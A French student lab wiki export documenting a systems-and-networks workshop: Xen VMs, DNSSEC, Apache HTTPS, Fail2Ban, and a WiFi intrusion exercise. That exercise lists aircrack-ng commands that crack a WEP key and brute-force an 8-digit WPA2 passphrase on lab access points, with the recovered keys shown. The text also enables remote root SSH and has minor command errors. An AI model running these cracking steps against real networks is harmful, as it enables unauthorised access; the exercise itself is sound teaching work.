Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &lt;br /&gt;
&lt;br /&gt;
De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12360</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12360"/>
		<updated>2026-02-23T13:50:21Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* SSH depuis l'extérieur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite nous activons la translation d'adresse NAT.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Remarque : Pour que ces changements soient persistants, il faut installer le paquet &amp;lt;code&amp;gt;iptable-persistent&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add chain PREROUTING&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2201 dnat to 192.168.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
